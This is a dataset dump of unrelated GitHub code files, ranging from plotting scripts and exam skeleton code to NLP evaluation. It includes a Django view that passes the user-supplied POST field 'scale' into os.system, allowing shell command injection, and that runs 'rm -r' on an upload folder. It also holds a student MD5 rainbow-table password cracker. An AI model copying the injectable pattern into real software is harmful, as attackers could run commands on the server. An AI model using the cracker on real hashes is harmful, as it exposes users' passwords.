+{"seq_id":"31216974063","text":"\"\"\"\nTabela de emojis Unicode: https://apps.timwhitlock.info/emoji/tables/unicode\n\nOriginal: U+1F60D\nModificado: U0001F60D => mantém o U e acrescenta 3 zeros e replica o resto do código.\n\nPara executar 1 vez\n for num in range(1, 11):\n print('\\U0001F60D' * num)\nSe quiser executar 3 vezes\nfor _ in range(3):\n for num in range(1, 11):\n print('\\U0001F60D' * num)\n\n\"\"\"\n\n\nfor _ in range(3):\n for num in range(1, 11):\n print('\\U0001F60D' * num)\n","repo_name":"vanderleikoziol/koziol-git1","sub_path":"secao06/emoji.py","file_name":"emoji.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"346030845","text":"import argparse\nimport pandas as pd\nfrom vcsl import *\nfrom torch.utils.data import DataLoader\nfrom loguru import logger\nfrom itertools import product, islice\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n\n parser.add_argument(\"--query-file\", \"-Q\", type=str, help=\"data file\")\n parser.add_argument(\"--reference-file\", \"-G\", type=str, help=\"data file\")\n parser.add_argument(\"--pair-file\", type=str, help=\"data file\")\n\n parser.add_argument(\"--input-store\", type=str, help=\"store of input data: oss|local\", default=\"oss\")\n parser.add_argument(\"--input-root\", type=str, help=\"root path of input data\", default=\"\")\n\n parser.add_argument(\"--oss-config\", type=str, default='~/ossutilconfig-copyright', help=\"url path\")\n parser.add_argument(\"--batch-size\", \"-b\", type=int, default=32, help=\"batch size\")\n parser.add_argument(\"--data-workers\", type=int, default=16, help=\"data workers\")\n parser.add_argument(\"--request-workers\", type=int, default=4, help=\"data workers\")\n parser.add_argument(\"--output-root\", type=str, help=\"output root\")\n parser.add_argument(\"--output-store\", type=str, help=\"store of output data: oss|local\")\n\n # Hyper parameters or input model\n parser.add_argument(\"--alignment-method\", type=str, default=\"DTW\", help=\"DTW, DP, TN alignment method\")\n\n parser.add_argument(\"--min-length\", type=int, default=5, help=\"minimum length of one segment\")\n parser.add_argument(\"--sum-sim\", type=float, default=10., help=\"minimum accumulated sim of one segment\")\n parser.add_argument(\"--ave-sim\", type=float, default=0.3, help=\"average sim of one segment\")\n parser.add_argument(\"--min-sim\", type=float, default=0.2, help=\"minimum average sim of one segment\")\n\n parser.add_argument(\"--max-path\", type=int, default=10, help=\"maximum number of paths to predict\")\n parser.add_argument(\"--discontinue\", type=int, default=3, help=\"max discontinue point in path\")\n parser.add_argument(\"--max-iou\", type=float, default=0.3, help=\"max iou to filter bboxes\")\n\n parser.add_argument(\"--diagonal-thres\", type=int, default=10, help=\"threshold for discarding a vertical/horizontal part of a segment for DP\")\n\n parser.add_argument(\"--tn-top-K\", type=int, default=5, help=\"top k nearest for TN\")\n parser.add_argument(\"--tn-max-step\", type=int, default=10, help=\"max step for TN\")\n\n parser.add_argument(\"--spd-model-path\", type=str, help=\"SPD model path\")\n parser.add_argument(\"--device\", type=str, help=\"cpu or cuda:0 or others, only valid to SPD inference\")\n parser.add_argument(\"--spd-conf-thres\", type=float, default=0.5, help=\"bounding box conf filter for SPD inference\")\n\n\n parser.add_argument(\"--params-file\", type=str)\n\n parser.add_argument(\"--result-file\", default=\"pred.json\", type=str, help=\"result path\")\n\n args = parser.parse_args()\n\n pairs, files_dict, query, reference = None, None, None, None\n if args.pair_file:\n df = pd.read_csv(args.pair_file)\n pairs = df[['query_id', 'reference_id']].values.tolist()\n\n data_list = [(f\"{p[0]}-{p[1]}\", f\"{p[0]}-{p[1]}\") for p in pairs]\n else:\n query = pd.read_csv(args.query_file)\n query = query[['uuid']].values.tolist()\n\n reference = pd.read_csv(args.reference_file)\n reference = reference[['uuid']].values.tolist()\n\n pairs = product(query, reference)\n data_list = [(f\"{p[0]}-{p[1]}\", f\"{p[0]}-{p[1]}\") for p in pairs]\n\n config = dict()\n if args.input_store == 'oss':\n config['oss_config'] = args.oss_config\n\n dataset = ItemDataset(data_list,\n store_type=args.input_store,\n data_type=DataType.NUMPY.type_name,\n root=args.input_root,\n trans_key_func=lambda x: x + '.npy',\n **config)\n\n logger.info(f\"Data to run {len(dataset)}\")\n\n loader = DataLoader(dataset, collate_fn=lambda x: x,\n batch_size=args.batch_size,\n num_workers=args.data_workers)\n\n model_config = dict()\n if args.alignment_method.startswith('DTW'):\n model_config = dict(\n discontinue=args.discontinue,\n min_sim=args.min_sim,\n min_length=args.min_length,\n max_iou=args.max_iou\n )\n elif args.alignment_method.startswith('TN'):\n model_config = dict(\n tn_max_step=args.tn_max_step, tn_top_k=args.tn_top_K, max_path=args.max_path,\n min_sim=args.min_sim, min_length=args.min_length, max_iou=args.max_iou\n )\n elif args.alignment_method.startswith('DP'):\n model_config = dict(discontinue=args.discontinue,\n min_sim=args.min_sim,\n ave_sim=args.ave_sim,\n min_length=args.min_length,\n diagonal_thres=args.diagonal_thres)\n elif args.alignment_method.startswith('HV'):\n model_config = dict(min_sim=args.min_sim, iou_thresh=args.max_iou)\n elif args.alignment_method.startswith('SPD'):\n model_config = dict(model_path=args.spd_model_path,\n conf_thresh=args.spd_conf_thres,\n device=args.device)\n else:\n raise ValueError(f\"Unknown VTA method: {args.alignment_method}\")\n\n # override model config with param file\n if args.params_file:\n reader = build_reader(args.input_store, DataType.JSON.type_name, **config)\n param_result = reader.read(args.params_file)\n best_params = param_result['best']\n logger.info(\"best param {}\", best_params)\n model_config = best_params['param']\n\n model = build_vta_model(method=args.alignment_method, concurrency=args.request_workers, **model_config)\n\n total_result = dict()\n for batch_data in islice(loader, 0, None):\n logger.info(\"data cnt: {}, {}\", len(batch_data), batch_data[0][0])\n batch_result = model.forward_sim(batch_data)\n logger.info(\"result cnt: {}\", len(batch_result))\n\n for pair_id, result in batch_result:\n total_result[pair_id] = result\n\n output_store = args.input_store if args.output_store is None else args.output_store\n if output_store == 'local' and not os.path.exists(args.output_root):\n os.makedirs(args.output_root, exist_ok=True)\n writer = build_writer(output_store, DataType.JSON.type_name, **config)\n writer.write(os.path.join(args.output_root, args.result_file), total_result)\n","repo_name":"ant-research/VCSL","sub_path":"run_video_vta.py","file_name":"run_video_vta.py","file_ext":"py","file_size_in_byte":6503,"program_lang":"python","lang":"en","doc_type":"code","stars":96,"dataset":"github-code","pt":"16"}
+{"seq_id":"23300989922","text":"# Skeleton Program for the AQA AS1 Summer 2020 examination\r\n# this code should be used in conjunction with the Preliminary Material\r\n# written by the AQA AS1 Programmer Team\r\n# developed in a Python 3 environment\r\n\r\n# Version number: 0.0.0\r\n\r\nEMPTY_STRING = \"\"\r\nMAX_WIDTH = 100\r\nMAX_HEIGHT = 100\r\n\r\nclass FileHeader:\r\n \"\"\"\r\n Parameters: self\r\n Description: Creates an object with a title, width, height and filetype\r\n \"\"\"\r\n def __init__(self):\r\n self.Title = EMPTY_STRING\r\n self.Width = MAX_WIDTH\r\n self.Height = MAX_HEIGHT\r\n self.FileType = EMPTY_STRING \r\n\r\ndef DisplayError(ErrorMessage):\r\n \"\"\"\r\n Parameters: String\r\n Description: Takes in a string as an error message displays it\r\n \"\"\"\r\n print(\"Error: \", ErrorMessage)\r\n\r\ndef PrintHeading(Heading):\r\n \"\"\"\r\n Parameters: String\r\n Description: Displays the heading underlined with equal symbols\r\n \"\"\"\r\n print(Heading)\r\n HeadingLength = len(Heading)\r\n for Position in range(1, HeadingLength + 1):\r\n print('=', end='')\r\n print()\r\n\r\ndef DisplayImage(Grid, Header):\r\n \"\"\"\r\n Parameters: List, Object\r\n Description: Prints image heading, then prints/displays the image\r\n \"\"\"\r\n print()\r\n PrintHeading(Header.Title)\r\n for ThisRow in range(Header.Height):\r\n for ThisColumn in range(Header.Width):\r\n print(Grid[ThisRow][ThisColumn], end='')\r\n print()\r\n\r\ndef SaveImage(Grid, Header):\r\n \"\"\"\r\n Parameters: 2D list, Object\r\n Description: \r\n \"\"\"\r\n print(\"The current title of your image is: \" + Header.Title)\r\n Answer = input(\"Do you want to use this as your filename? (Y/N) \")\r\n if Answer == \"N\" or Answer == \"n\":\r\n FileName = input(\"Enter a new filename: \")\r\n else:\r\n FileName = Header.Title\r\n FileOut = open(FileName + \".txt\", 'w')\r\n FileOut.write(Header.Title + '\\n')\r\n for Row in range(Header.Height):\r\n for Column in range(Header.Width):\r\n FileOut.write(Grid[Row][Column])\r\n FileOut.write('\\n')\r\n FileOut.close()\r\n\r\ndef EditImage(Grid, Header):\r\n \"\"\"\r\n Parameters: 2D List, Object\r\n Return Type: 2D List\r\n Description: Allows user to edit the image by changing one of the symbols to another \r\n \"\"\"\r\n DisplayImage(Grid, Header)\r\n Answer = EMPTY_STRING\r\n while Answer != \"N\":\r\n Symbol = EMPTY_STRING\r\n NewSymbol = EMPTY_STRING\r\n while len(Symbol) != 1:\r\n Symbol = input(\"Enter the symbol you want to replace: \")\r\n while len(NewSymbol) != 1:\r\n NewSymbol = input(\"Enter the new symbol: \")\r\n for ThisRow in range(Header.Height):\r\n for ThisColumn in range(Header.Width):\r\n if Grid[ThisRow][ThisColumn] == Symbol:\r\n Grid[ThisRow][ThisColumn] = NewSymbol\r\n DisplayImage(Grid, Header)\r\n Answer = input(\"Do you want to make any further changes? (Y/N) \")\r\n return Grid\r\n\r\ndef ConvertChar(PixelValue):\r\n \"\"\"\r\n Parameters: Integer\r\n Return Type: String\r\n Description: Returns a character based on the value of the pixel put in\r\n \"\"\"\r\n if PixelValue <= 32:\r\n AsciiChar = '#'\r\n elif PixelValue <= 64:\r\n AsciiChar = '&'\r\n elif PixelValue <= 96:\r\n AsciiChar = '+'\r\n elif PixelValue <= 128:\r\n AsciiChar = ';'\r\n elif PixelValue <= 160:\r\n AsciiChar = ':'\r\n elif PixelValue <= 192:\r\n AsciiChar = ','\r\n elif PixelValue <= 224:\r\n AsciiChar = '.'\r\n else:\r\n AsciiChar = ' '\r\n return AsciiChar\r\n\r\ndef LoadGreyScaleImage(FileIn, Grid, Header):\r\n \"\"\"\r\n Parameters: String, 2D List, Object\r\n Return Type: 2D List\r\n Description: Loads an image using each pixel and a specific code assigned to each pixel\r\n \"\"\"\r\n try:\r\n for Row in range(Header.Height):\r\n for Column in range(Header.Width):\r\n NextPixel = FileIn.readline()\r\n PixelValue = int(NextPixel)\r\n Grid[Row][Column] = ConvertChar(PixelValue)\r\n except:\r\n DisplayError(\"Image data error\") \r\n return Grid\r\n \r\ndef LoadAsciiImage(FileIn, Grid, Header):\r\n \"\"\"\r\n Parameters: String, 2D List, Object\r\n Return Type: 2D List\r\n Description: Loads an image using the width and height of the heading as dimensions\r\n \"\"\"\r\n try:\r\n ImageData = FileIn.readline()\r\n NextChar = 0\r\n for Row in range(Header.Height):\r\n for Column in range(Header.Width):\r\n Grid[Row][Column] = ImageData[NextChar]\r\n NextChar += 1\r\n except:\r\n DisplayError(\"Image data error\")\r\n return Grid\r\n\r\ndef LoadFile(Grid, Header):\r\n \"\"\"\r\n Parameters: 2D List, Object\r\n Return Type: 2D List, Object\r\n Description: Opens the file in read mode, and then splits each line into fields and loads an asciiImage or greyscaleimage as the grid depending on the filetype of the header, and then checks if the file exists, and finally returns the grid\r\n \"\"\"\r\n FileFound = False\r\n FileTypeOK = False\r\n FileName = input(\"Enter filename to load: \")\r\n try:\r\n FileIn = open(FileName + \".txt\", 'r')\r\n FileFound = True\r\n HeaderLine = FileIn.readline()\r\n Fields = HeaderLine.split(',')\r\n Header.Title = Fields[0]\r\n Header.Width = int(Fields[1])\r\n Header.Height = int(Fields[2])\r\n Header.FileType = Fields[3]\r\n Header.FileType = Header.FileType[0]\r\n if Header.FileType == 'A': \r\n Grid = LoadAsciiImage(FileIn, Grid, Header)\r\n FileTypeOK = True\r\n elif Header.FileType == 'G': \r\n Grid = LoadGreyScaleImage(FileIn, Grid, Header)\r\n FileTypeOK = True\r\n FileIn.close()\r\n if not FileTypeOK:\r\n DisplayError(\"Unknown file type\")\r\n else:\r\n DisplayImage(Grid, Header)\r\n except:\r\n if not FileFound:\r\n DisplayError(\"File not found\")\r\n else:\r\n DisplayError(\"Unknown error\")\r\n return Grid, Header\r\n\r\ndef SaveFile(Grid, Header):\r\n \"\"\"\r\n Parameters: 2D List, Object\r\n Description: Opens a file required by the user in write mode, then writes each field to the file separated by commas, and also writes the grid to the file, and then closes it\r\n \"\"\"\r\n FileName = input(\"Enter filename: \")\r\n FileOut = open(FileName + \".txt\", 'w')\r\n FileOut.write(Header.Title + ',' + str(Header.Width) + ',' + str(Header.Height) + ',' + 'A' + '\\n')\r\n for Row in range(Header.Height):\r\n for Column in range(Header.Width):\r\n FileOut.write(Grid[Row][Column])\r\n FileOut.close()\r\n\r\ndef ClearGrid(Grid):\r\n \"\"\"\r\n Parameters: 2D List\r\n Return Type: 2D List\r\n Description: Clears the grid by replacing each pixel with a . and returns it\r\n \"\"\"\r\n for Row in range(MAX_HEIGHT):\r\n for Column in range(MAX_WIDTH):\r\n Grid[Row][Column] = '.'\r\n return Grid\r\n \r\ndef DisplayMenu():\r\n \"\"\"\r\n Description: Displays the main menu screen\r\n \"\"\"\r\n print()\r\n print(\"Main Menu\")\r\n print(\"=========\")\r\n print(\"L - Load graphics file\") \r\n print(\"D - Display image\")\r\n print(\"E - Edit image\")\r\n print(\"S - Save image\")\r\n print(\"X - Exit program\") \r\n print()\r\n\r\ndef GetMenuOption():\r\n \"\"\"\r\n Return Type: String\r\n Description: Asks the user to enter their menu option and returns it\r\n \"\"\"\r\n MenuOption = EMPTY_STRING\r\n while len(MenuOption) != 1:\r\n MenuOption = input(\"Enter your choice: \")\r\n return MenuOption\r\n \r\ndef Graphics():\r\n \"\"\"\r\n Description: Displays the menu, then asks for a menu option, then does the according function depending on the user's selected option, then saves the file\r\n \"\"\"\r\n Grid = [['' for Column in range(MAX_WIDTH)] for Row in range(MAX_HEIGHT)]\r\n Grid = ClearGrid(Grid)\r\n Header = FileHeader()\r\n ProgramEnd = False\r\n while not ProgramEnd:\r\n DisplayMenu()\r\n MenuOption = GetMenuOption()\r\n if MenuOption == 'L':\r\n Grid, Header = LoadFile(Grid, Header)\r\n elif MenuOption == 'D':\r\n DisplayImage(Grid, Header) \r\n elif MenuOption == 'E':\r\n Grid = EditImage(Grid, Header) \r\n elif MenuOption == 'S': \r\n SaveImage(Grid, Header)\r\n elif MenuOption == 'X':\r\n ProgramEnd = True\r\n else:\r\n print(\"You did not choose a valid menu option. Try again\")\r\n print(\"You have chosen to exit the program\")\r\n Answer = input(\"Do you want to save the image as a graphics file? (Y/N) \")\r\n if Answer == \"Y\" or Answer == \"y\":\r\n SaveFile(Grid, Header)\r\n \r\nif __name__ == \"__main__\":\r\n Graphics() \r\n","repo_name":"Usman198316/Programming-Challenges","sub_path":"2020 Pre-Release/A-level_Computer Science_Computer Science (7517)_Preliminary Material_AS_June 2020 (to be used in autumn 2020)_Python 3_Paper1_AS_2020_Python3_Pub_0.0.0.py","file_name":"A-level_Computer Science_Computer Science (7517)_Preliminary Material_AS_June 2020 (to be used in autumn 2020)_Python 3_Paper1_AS_2020_Python3_Pub_0.0.0.py","file_ext":"py","file_size_in_byte":8094,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"5079137045","text":"from django.http import HttpResponse \nfrom django.shortcuts import render, redirect\nimport os\nfrom home import forms\nfrom django.views.generic import TemplateView\nimport os\n\nclass Index(TemplateView):\n template_name = 'home/index.html'\n\ndef ShipDetection_view(request):\n if request.method == 'POST': \n form = forms.ShipForm(request.POST, request.FILES) \n \n if form.is_valid(): \n form.save() \n scale = request.POST.get(\"scale\")\n return predict(request, scale)\n else:\n print(os.getcwd())\n os.system('rm -r ./media/images/')\n form = forms.ShipForm() \n return render(request, 'home/im.html', {'form' : form}) \n\n \ndef predict(request, scale): \n path = os.getcwd()\n\n ls = os.listdir('./media/images/')\n os.chdir(path + '/home/model/SIH5/model/darknet/')\n os.system('python3 r3unfile.py ' + path + '/media/images/' + str(ls[0] + ' ' + path) + ' ' + str(scale))\n os.chdir(path + '/')\n return render(request, 'home/display_images.html')\n\n\ndef Upload(request):\n image = request.POST.get('image')\n print(type(image))\n return render(request, 'home/upload_image.html')\n\ndef display_ship_images(request): \n \n if request.method == 'GET': \n return render(request, 'home/display_images.html')\n","repo_name":"himdhiman/SIH-2020-Ship_Detection-Project-ISRO","sub_path":"home/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1296,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"}
+{"seq_id":"2648627903","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Mar 20 17:52:01 2014\n\n@author: namm\n\"\"\"\nimport sys\nsys.path.append(\"..\")\nfrom agente_prospector.agente.controlo import Controlo\n\nfrom agente_prospector.controlo_react.reaccoes.reaccao_avancar import ReaccaoAvancar\n\n\nclass ControloReact(Controlo):\n \n def __init__(self):\n self._reaccao = ReaccaoAvancar()\n \n def processar(self, percepcao):\n accao = self._reaccao.activar(percepcao)\n return accao\n \n","repo_name":"jorge-ribamar/IASA","sub_path":"src/agente_prospector/controlo_react/controlo_react.py","file_name":"controlo_react.py","file_ext":"py","file_size_in_byte":480,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"11216205358","text":"import matplotlib.pyplot as plt\n\n\nclass VisualizePlays(object):\n def __init__(self, *agents, alpha=0.8):\n \"\"\"\n create a visualization method\n Args:\n agents (object): trained q-learning agent\n \"\"\"\n self.agents = agents\n self.aplpha = alpha\n self.x_label = \"#episodes\"\n\n def plot_reward(self):\n \"\"\"_summary_\"\"\"\n\n plt.title(\"Reward over time per episode\")\n for i, agent in enumerate(self.agents):\n plt.plot(\n agent.rewards,\n c=agent.color,\n label=agent.name,\n linewidth=1,\n linestyle=\"-\",\n alpha=self.aplpha,\n )\n plt.xlabel(self.x_label)\n plt.ylabel(\"Reward\")\n plt.grid()\n plt.legend(\n loc=\"upper center\",\n bbox_to_anchor=(0.5, -0.05),\n fancybox=True,\n shadow=True,\n ncol=1,\n )\n\n def plot_epsilon(self):\n \"\"\"_summary_\"\"\"\n\n # 2\n plt.title(\"Exploration parameter epsilon per episode\")\n for i, agent in enumerate(self.agents):\n plt.plot(\n agent.epsilons,\n c=agent.color,\n label=agent.name,\n linewidth=1,\n linestyle=\"-\",\n alpha=self.aplpha,\n )\n plt.xlabel(self.x_label)\n plt.ylabel(\"Epsilon\")\n plt.grid()\n plt.legend(\n loc=\"upper center\",\n bbox_to_anchor=(0.5, -0.05),\n fancybox=True,\n shadow=True,\n ncol=1,\n )\n\n def plot_last_agent_state(self):\n \"\"\"_summary_\"\"\"\n plt.title(\"Last state the agent is standing on at the end of the episode\")\n for i, agent in enumerate(self.agents):\n plt.plot(\n agent.last_states,\n c=agent.color,\n label=agent.name,\n linewidth=1,\n linestyle=\"-\",\n alpha=self.aplpha,\n )\n plt.xlabel(self.x_label)\n plt.ylabel(\"last state number\")\n plt.grid()\n plt.legend(\n loc=\"upper center\",\n bbox_to_anchor=(0.5, -0.05),\n fancybox=True,\n shadow=True,\n ncol=1,\n )\n\n def plot_q_values(self):\n \"\"\"_summary_\"\"\"\n plt.title(\"Average of the value of the q-table\")\n for i, agent in enumerate(self.agents):\n plt.plot(\n agent.q_averages,\n c=agent.color,\n label=agent.name,\n linewidth=1,\n linestyle=\"-\",\n alpha=self.aplpha,\n )\n plt.xlabel(self.x_label)\n plt.ylabel(\"q-table average values\")\n plt.grid()\n plt.legend(\n loc=\"upper center\",\n bbox_to_anchor=(0.5, -0.05),\n fancybox=True,\n shadow=True,\n ncol=1,\n )\n\n def plot(self):\n \"\"\"_summary_\"\"\"\n\n plt.figure(figsize=(10, 20))\n\n plt.subplot(4, 1, 1)\n self.plot_reward()\n\n plt.subplot(4, 1, 2)\n self.plot_epsilon()\n\n plt.subplot(4, 1, 3)\n self.plot_last_agent_state()\n\n plt.subplot(4, 1, 4)\n self.plot_q_values()\n\n plt.tight_layout()\n plt.show()\n","repo_name":"MauroLuzzatto/Q-Learning-Demo-Play-nChain","sub_path":"helper_functions/visualize_plays.py","file_name":"visualize_plays.py","file_ext":"py","file_size_in_byte":3349,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"}
+{"seq_id":"2556350229","text":"# user=int(input(\"enter the number :\"))\n# a=2\n# count=0\n# while a>0:\n# b=2\n# while b':\n if right:\n left.append(right.popleft())\n elif ch == '-':\n if left:\n left.pop()\n else:\n left.append(ch)\n print(''.join(left) + ''.join(right))\n","repo_name":"gemstoneyang/Algorithm","sub_path":"BOJ/Data_Structure/5397.py","file_name":"5397.py","file_ext":"py","file_size_in_byte":563,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"2499039687","text":"import argparse\nfrom seqeval.metrics import classification_report\nfrom seqeval.metrics import accuracy_score\n\nfrom collections import defaultdict # available in Python 2.5 and newer\nfrom sklearn.metrics import confusion_matrix\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport pandas as pd\n\n\ndef read_conllu(file, column):\n fin = open(file)\n sentences = []\n sentence = []\n for line in fin:\n if line.startswith('#'):\n continue\n if line is None or line == '\\n':\n sentences.append(sentence)\n sentence = []\n else:\n columns = line.rstrip().split('\\t')\n if not '.' in columns[0]:\n sentence.append(line.rstrip().split('\\t')[column])\n if len(sentence) > 0:\n sentences.append(sentence)\n return sentences\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--gold_file\", type=str)\nparser.add_argument(\"--pred_file\", type=str)\nparser.add_argument(\"--out_plot\", type=str)\nparser.add_argument(\"--column\", type=int, default=5)\nargs = parser.parse_args()\n\ny_true = read_conllu(args.gold_file, args.column)\ny_pred = read_conllu(args.pred_file, args.column)\n\nflat_y_true = [item for sublist in y_true for item in sublist]\nflat_y_pred = [item for sublist in y_pred for item in sublist]\n\nassert len(flat_y_true) == len(flat_y_pred)\n\nprint(classification_report(y_true, y_pred, digits=4))\nprint(accuracy_score(y_true, y_pred))\n\n# Creates a confusion matrix\nlabel_count = defaultdict(int)\nfor label in flat_y_true:\n label_count[label] += 1\n\nlabels = []\nfor l,c in label_count.items():\n if c > 20:\n labels.append(l)\n\ncm = confusion_matrix(flat_y_true, flat_y_pred, labels=labels)\ncm_df = pd.DataFrame(cm, index=labels, columns=labels)\n\nplt.figure(figsize=(50, 50))\nsns.heatmap(cm_df, annot=True, cmap=\"YlGnBu\")\nplt.ylabel('True label')\nplt.xlabel('Predicted label')\nplt.savefig(args.out_plot, bbox_inches='tight')\nplt.close()\n\n","repo_name":"ahmetustun/udapter","sub_path":"scripts/seq_eval.py","file_name":"seq_eval.py","file_ext":"py","file_size_in_byte":1952,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"16"}
+{"seq_id":"5495328374","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Dec 10 16:28:05 2021\n\n@author: lexipfalzgraf\n\"\"\"\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\nHegelFreq=pd.read_csv('hegelFreq.csv')\nMacyFreq=pd.read_csv('macyFreq.csv')\nMontFreq=pd.read_csv('montFreq.csv')\nWebFreq=pd.read_csv('webFreq.csv')\nWilsonFreq=pd.read_csv('WilsonFreq.csv')\n\n\nplt.rcParams['font.sans-serif'] = \"Times New Roman\"\nplt.rcParams['font.family'] = \"sans-serif\"\nplt.locator_params(axis=\"x\", nbins=13)\nplt.locator_params(axis=\"y\", nbins=6)\nplt.xlabel(\"Year\", loc='center')\nplt.ylabel(\"Frequency of Usage by Author\", loc='center')\nplt.xticks(fontsize=10)\nplt.yticks(fontsize=10)\nplt.ylim(top=25) \nplt.ylim(bottom=0)\n\nMacyFreq['Rolling'] = MacyFreq['Frequence'].rolling(5).mean()\nMontFreq['Rolling'] = MontFreq['Frequence'].rolling(5).mean()\nWebFreq['Rolling'] = WebFreq['Frequence'].rolling(5).mean()\nWilsonFreq['Rolling'] = WilsonFreq['Frequence'].rolling(5).mean()\nHegelFreq['Rolling'] = HegelFreq['Frequence'].rolling(5).mean()\n\nHegelFreq['Rolling']= 100*HegelFreq['Rolling']\nMacyFreq['Rolling']= 100*MacyFreq['Rolling']\nMontFreq['Rolling']= 100*MontFreq['Rolling']\nWebFreq['Rolling']= 100*WebFreq['Rolling']\nWilsonFreq['Rolling']= 100*WilsonFreq['Rolling']\n\nplt.plot(HegelFreq['Year'], HegelFreq['Rolling'], label = \"Hegel\", color=\"gainsboro\",linewidth=1, linestyle=\"dashed\")\nplt.plot(MacyFreq['Year'], MacyFreq['Rolling'], label = \"Macy\", color=\"darkgrey\",linewidth=1, linestyle=\"dotted\")\nplt.plot(MontFreq['Year'], MontFreq['Rolling'], label = \"Montesquieu\", color=\"dimgrey\",linewidth=1, linestyle=\"dashdot\")\nplt.plot(WebFreq['Year'], WebFreq['Rolling'], label = \"Weber\", color=\"black\",linewidth=1, linestyle=\"solid\")\nplt.plot(WilsonFreq['Year'], WilsonFreq['Rolling'], label = \"Wilson\", color=\"lightgrey\",linewidth=1, linestyle=\"solid\")\n\n\nplt.legend(loc=1, prop={'size': 7})\n\n#plt.savefig(\"freqAuthors.png\",dpi=200, bbox_inches=\"tight\")\nplt.show()\n\n","repo_name":"lpfalz/SpiritData","sub_path":"frequencePlot.py","file_name":"frequencePlot.py","file_ext":"py","file_size_in_byte":1947,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"18092751800","text":"import hashlib\r\nfrom os import read\r\nimport re\r\n\r\npwdListLength = 1\r\nrainbowTable = []\r\n\r\n# Read in list of possible pwds + print no. of pwds processed\r\ndef processFile():\r\n global pwdListLength\r\n txtFile = open(\"Wordlist.txt\")\r\n list = []\r\n for word in txtFile:\r\n #remove '/n' from readIn and append to list\r\n list.append([word.strip('\\n'),False])\r\n print(\"No. of words read from file:\",len(list))\r\n pwdListLength = len(list)\r\n return list\r\n\r\n# Reduction Function\r\ndef reductionFunc(reduced):\r\n global pwdListLength\r\n reduced = re.sub(r'[a-zA-Z]',\"\",reduced) # remove all alphabetic char\r\n reduced = (int(reduced) * (pwdListLength % 32)) # modulo by length of passwordList \r\n reduced = str(reduced) # convert back to str\r\n return str(reduced[:6]) # return first six digits\r\n\r\n# Hash Function\r\ndef hashFunc(hashed):\r\n #encode var to bytes\r\n enc = bytes(hashed, encoding='utf-8')\r\n enc = hashlib.md5(enc)\r\n return (enc.hexdigest())\r\n\r\n# Reduce and Hash Function\r\ndef redHashFunc(finalValue):\r\n finalValue = reductionFunc(finalValue)\r\n return hashFunc(finalValue)\r\n\r\n# generate rainbowTable into txt file\r\ndef tableGenerator(rainbowTable):\r\n txtFile = open('Rainbowtable.txt','w')\r\n for i in rainbowTable:\r\n txtFile.write(\"%s %s \\n\" % (i[0],i[1]))\r\n txtFile.close\r\n print(\"Rainbowtable.txt consists of %s lines.\"%(len(rainbowTable)))\r\n\r\npasswordList = processFile()\r\n\r\nfor word in passwordList:\r\n word[1] = True\r\n pw = word[0]\r\n pw = hashFunc(pw)\r\n for i in range(5):\r\n pw = redHashFunc(pw)\r\n rainbowTable.append([word[0],pw])\r\n\r\n#sort table by hash values.\r\nrainbowTable = sorted(rainbowTable, key=lambda x:x[1]) \r\ntableGenerator(rainbowTable)\r\n\r\n# SECOND STEP\r\n# check if hash value exists in table\r\ndef checkHash(hash):\r\n for value in rainbowTable:\r\n if hash == value[1]:\r\n return (True,value)\r\n return (False,None)\r\n\r\ndef findHash(hash):\r\n count = 0\r\n while (count < 10000):\r\n hash = reductionFunc(hash)\r\n hash = hashFunc(hash)\r\n count += 1\r\n result = checkHash(hash)\r\n if (result[0]): \r\n #return word if found\r\n return result[1][0]\r\n print(\"Unable to identify hash\")\r\n exit()\r\n\r\n# function to check if word matches hash value\r\ndef checkWordHash(word,hash):\r\n count = 0\r\n word = hashFunc(word)\r\n while((word!=hash)):\r\n word = redHashFunc(word)\r\n count += 1\r\n if count>10000:\r\n print (\"Unable to match word to hash value\")\r\n exit()\r\n return True\r\n\r\n# user input\r\nhash_input=''\r\n\r\nwhile(True):\r\n print(\"\\nPlease enter hash value\")\r\n hash_input = input()\r\n if(len(hash_input) == 32): # check that hash value length is 32\r\n break\r\n else:\r\n print('Hash Value does not exist!')\r\n\r\nresult = checkHash(hash_input)\r\n\r\nif(result[0]):\r\n if(checkWordHash ( result[1][0], hash_input ) ):\r\n print(\"Pre-image of \",hash_input,\" found! The word is\",result[1][0])\r\nelse:\r\n word = findHash(hash_input)\r\n if(checkWordHash ( word, hash_input ) ):\r\n print(\"Pre-image of \",hash_input,\" The word is\", word)","repo_name":"kikoken831/CSIT622","sub_path":"old/Assignment 1/rainbowTable.py","file_name":"rainbowTable.py","file_ext":"py","file_size_in_byte":3193,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"}
